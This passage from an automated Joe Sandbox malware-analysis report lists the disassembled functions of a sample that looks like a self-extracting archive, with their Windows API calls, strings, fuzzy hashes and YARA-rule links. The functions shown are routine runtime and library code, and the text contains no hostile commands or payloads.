Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: db6ae0074ed855282495a25ef839ffde6b161c55a8c505cb1725ed8a6d5c8498
Instruction ID: c595c3be7dcbdbba2f40eb3034dc4688a01a0e59c1dec2329269979808171d4a
Opcode Fuzzy Hash: db6ae0074ed855282495a25ef839ffde6b161c55a8c505cb1725ed8a6d5c8498
Instruction Fuzzy Hash: 25515C6670032395DB329A199C21B7673E0DFA1750F6AC61BF9C99B6C0FB6D8C418361

Function 0038F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0038FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0038F6CF
__fassign.LIBCMT ref: 0038F74A
__fassign.LIBCMT ref: 0038F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0038F78B
WriteFile.KERNEL32(?,00000000,00000000,0038FE02,00000000,?,?,?,?,?,?,?,?,?,0038FE02,00000000), ref: 0038F7AA
WriteFile.KERNEL32(?,00000000,00000001,0038FE02,00000000,?,?,?,?,?,?,?,?,?,0038FE02,00000000), ref: 0038F7E3

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 959823b8146778455751fee01635ca8a0af6c411c4b3abec9c9a614a7f689e95
Instruction ID: 4f51bcbf06bc860e9053dd3af21733da2b465ac36f9b01733c2b62d604c80713
Opcode Fuzzy Hash: 959823b8146778455751fee01635ca8a0af6c411c4b3abec9c9a614a7f689e95
Instruction Fuzzy Hash: 2851A3B19003099FDB11DFA8DC85AEEBBF8EF09300F1541AAE555E7251E670AA40CBA0

Function 0037CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0037CE9D

Part of subcall function 0036B690: _wcslen.LIBCMT ref: 0036B696

_swprintf.LIBCMT ref: 0037CED1

Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5

SetDlgItemTextW.USER32(?,00000066,003A946A), ref: 0037CEF1
_wcschr.LIBVCRUNTIME ref: 0037CF22
EndDialog.USER32(?,00000001), ref: 0037CFFE

Strings

%s%s%u, xrefs: 0037CEC6

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
String ID: %s%s%u
API String ID: 689974011-1360425832
Opcode ID: 0e62337706d4ae01ddf1d23c1959e348a88d15ea35df1d8ec3455ad6d3536717
Instruction ID: 7564973a3c1f479132d0fe3db62590c168a8150e497608c6c3e502c623f2d1e8
Opcode Fuzzy Hash: 0e62337706d4ae01ddf1d23c1959e348a88d15ea35df1d8ec3455ad6d3536717
Instruction Fuzzy Hash: 84416071900658AADF36DB50DC45EEA77BCEB05300F40C0A6F90DE7041EB789A44CF61

Function 00382900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00382937
___except_validate_context_record.LIBVCRUNTIME ref: 0038293F
_ValidateLocalCookies.LIBCMT ref: 003829C8
__IsNonwritableInCurrentImage.LIBCMT ref: 003829F3
_ValidateLocalCookies.LIBCMT ref: 00382A48

Strings

csm, xrefs: 003829DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d3e9097407bf6a1163753d4b361fdc4285f8e61dcad809867022ada472f4e938
Instruction ID: de3babe8bf5b6772dae09a79da6d80216a5897988ca1816a6ec46cd607ff1081
Opcode Fuzzy Hash: d3e9097407bf6a1163753d4b361fdc4285f8e61dcad809867022ada472f4e938
Instruction Fuzzy Hash: 6041C234A00308AFCF16EF68C885A9FBBF5AF45324F1480D6E815AB392D735DA51CB91

Function 00379955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0037995E
_wcslen.LIBCMT ref: 00379993

Strings

 , xrefs: 00379A21
, xrefs: 003799B0
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00379987
<br>, xrefs: 003799DF

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 4d8726f119d399f7a8e999cbb316df6f1881e2df94a7494a2e00b2b8584bafb2
Instruction ID: 36d0c408be98843a75ecfe7dff2c8374419f6cb5ba02bd1846399e8ca077fb15
Opcode Fuzzy Hash: 4d8726f119d399f7a8e999cbb316df6f1881e2df94a7494a2e00b2b8584bafb2
Instruction Fuzzy Hash: A631A27264430556DA32BB549C03F7B73A4EB80720F51C61FF98A4B2C0FB68BD4183A1

Function 0038C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0038C868: _free.LIBCMT ref: 0038C891

_free.LIBCMT ref: 0038C8F2

Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4

_free.LIBCMT ref: 0038C8FD
_free.LIBCMT ref: 0038C908
_free.LIBCMT ref: 0038C95C
_free.LIBCMT ref: 0038C967
_free.LIBCMT ref: 0038C972
_free.LIBCMT ref: 0038C97D

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: bf1f6088252f0041dacd8b31dbabbf9fb8f6507266c8744e43d4b1591f41a24c
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 5E1163715D0B08BAE522B7B1CC0BFCB7BADEF00B00F801C55B29D6E592EA75B5098760

Function 0037E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0037E669,0037E5CC,0037E86D), ref: 0037E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0037E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0037E630

Strings

ReleaseSRWLockExclusive, xrefs: 0037E625
AcquireSRWLockExclusive, xrefs: 0037E615
KERNEL32.DLL, xrefs: 0037E600

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 9bca716975354faa2f58efcfa3070d5f678716004981292273373ca8ec3d5c59
Instruction ID: a38114352668f05c9ee803f0372b35c57939219cbbe0d683dbaaf639ac8906d7
Opcode Fuzzy Hash: 9bca716975354faa2f58efcfa3070d5f678716004981292273373ca8ec3d5c59
Instruction Fuzzy Hash: 7DF02BB57802225B4F335F755C84AA632CC6B2E741712C4B9E90ED3201EB28CC606B90

Function 00388900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0038891E

Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4

_free.LIBCMT ref: 00388930
_free.LIBCMT ref: 00388943
_free.LIBCMT ref: 00388954
_free.LIBCMT ref: 00388965

Strings

p9, xrefs: 00388914

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: p9
API String ID: 776569668-1904256876
Opcode ID: fdf6a842b2277d13eaa610a2fb94ee3449f362d5e48a9d1b15ac801979258f33
Instruction ID: 51f6e7597ec5d839c00307d72c53b6ae5e7a73af024ecd2d107c4f3c9e006e50
Opcode Fuzzy Hash: fdf6a842b2277d13eaa610a2fb94ee3449f362d5e48a9d1b15ac801979258f33
Instruction Fuzzy Hash: DDF0D076810212DB8687BF24FD018163BAAF724724F810546F554D63B1CFB25D569B91

Function 0037146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 003714C2

Part of subcall function 0036B146: GetVersionExW.KERNEL32(?), ref: 0036B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003714E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00371500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00371513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00371523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00371533

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 2ce4ed4a85ffaa945ade7845202aa451fbfef8579b5f7433d189b63a69fe0ff1
Instruction ID: 1972b86c7d3284ff62065b7c64640106545071710f9e9525fbefeadb87153ffc
Opcode Fuzzy Hash: 2ce4ed4a85ffaa945ade7845202aa451fbfef8579b5f7433d189b63a69fe0ff1
Instruction Fuzzy Hash: 3C31FA76118305ABC705DFA9C88499BB7FCBF98714F00491EF599C3210E734D549CBA6

Function 00382AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00382AF1,003802FC,0037FA34), ref: 00382B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00382B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00382B2F
SetLastError.KERNEL32(00000000,00382AF1,003802FC,0037FA34), ref: 00382B81

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8b9deefe89c355e4955f912583bcec88be14b595c5934d33c906ac9315a6bed7
Instruction ID: a56b27f71d7cf575e9d17aa7a2d3d3d8bb1a5e51ffa4cc694eb2df827d21dfcf
Opcode Fuzzy Hash: 8b9deefe89c355e4955f912583bcec88be14b595c5934d33c906ac9315a6bed7
Instruction Fuzzy Hash: 4001D43310A711AEE6273BF4BC899672B9DEB41BB4B6007BBF510592E0EF625C40D344

Function 003897E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,003A1030,00384674,003A1030,?,?,00383F73,00000050,?,003A1030,00000200), ref: 003897E9
_free.LIBCMT ref: 0038981C
_free.LIBCMT ref: 00389844
SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 00389851
SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 0038985D
_abort.LIBCMT ref: 00389863

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 20f022e759e30ac85defc4e06a444639c2dc7f16df2dfa2717cf9f4da929b622
Instruction ID: f8fae1f6cb7768ed38c9422440caccb48a6fcf59ebc2f55428593429b002ac63
Opcode Fuzzy Hash: 20f022e759e30ac85defc4e06a444639c2dc7f16df2dfa2717cf9f4da929b622
Instruction Fuzzy Hash: 22F0C83614070366C6133374BC0AB7B1A6D8FD2771F2A05ABF525AA292FF3188068765

Function 0037DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0037DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037DC72
TranslateMessage.USER32(?), ref: 0037DC7C
DispatchMessageW.USER32(?), ref: 0037DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0037DC91

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 5bf4e77677001fdf783dde8d167976c6580c101bddcafb44700d6af329d52384
Instruction ID: 3ec7e4b3a4e686e1f298604d8da7f75361064f9c24627bfa1c4cfa752fd3d022
Opcode Fuzzy Hash: 5bf4e77677001fdf783dde8d167976c6580c101bddcafb44700d6af329d52384
Instruction Fuzzy Hash: ABF03C72A01229BBCB326BA5EC4DDDB7F7DEF41791F008011B50BD2050D6799646CBA0

Function 0037A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 0037A699: GetDC.USER32(00000000), ref: 0037A69D
Part of subcall function 0037A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0037A6A8
Part of subcall function 0037A699: ReleaseDC.USER32(00000000,00000000), ref: 0037A6B3

GetObjectW.GDI32(?,00000018,?), ref: 0037A83C

Part of subcall function 0037AAC9: GetDC.USER32(00000000), ref: 0037AAD2
Part of subcall function 0037AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0037AB01
Part of subcall function 0037AAC9: ReleaseDC.USER32(00000000,?), ref: 0037AB99

Strings

(, xrefs: 0037A9AA
A7, xrefs: 0037A9BA
"7, xrefs: 0037A89D, 0037AAB9

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: "7$($A7
API String ID: 1061551593-3396645701
Opcode ID: 9640c8597578d0effdccbf1cb95a8ef6ddb4aaf1c5e3412271874d7f6e2dd501
Instruction ID: dc3a7abdf124029d27981604d5698bb97cf0bb1aebefc952a537c13489f3cc48
Opcode Fuzzy Hash: 9640c8597578d0effdccbf1cb95a8ef6ddb4aaf1c5e3412271874d7f6e2dd501
Instruction Fuzzy Hash: A991F2B1608754AFD661DF29C84492BBBF8FFC9700F00891EF59AD3260DB35A945CB62

Function 0036C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0

Part of subcall function 0036B92D: _wcsrchr.LIBVCRUNTIME ref: 0036B944

_wcslen.LIBCMT ref: 0036C197
_wcslen.LIBCMT ref: 0036C1DF

Strings

.sfx, xrefs: 0036C11A
.rar, xrefs: 0036C0E1, 0036C134
.exe, xrefs: 0036C10B

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 255ed14aba28fa9f6abd28a4019d216b0be9ff758ab633ca3d9bf819e58c145a
Instruction ID: f53bdbbb0828b154a5d8168c9cb284c519b9219790794572d348b0018d496d65
Opcode Fuzzy Hash: 255ed14aba28fa9f6abd28a4019d216b0be9ff758ab633ca3d9bf819e58c145a
Instruction Fuzzy Hash: C7417A22560315D5CB33AF748812A7BB3A8EF42704F11E90EFCD6AF189EB648D81C395

Function 0036BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0036BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0036A275,?,?,00000800,?,0036A23A,?,0036755C), ref: 0036BBC5
_wcslen.LIBCMT ref: 0036BC3B

Strings

UNC, xrefs: 0036BBA7
\\?\, xrefs: 0036BB52, 0036BB99, 0036BBF7, 0036BC4E

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 222c2e2fd026fe256d5bc87831745935413ace9d7e8eb2e73144506ae8ef160e
Instruction ID: 6735344d2a343eaf59fdcd5fa15fca07410fc994f2c3070e3a82ccfde8cbf5e1
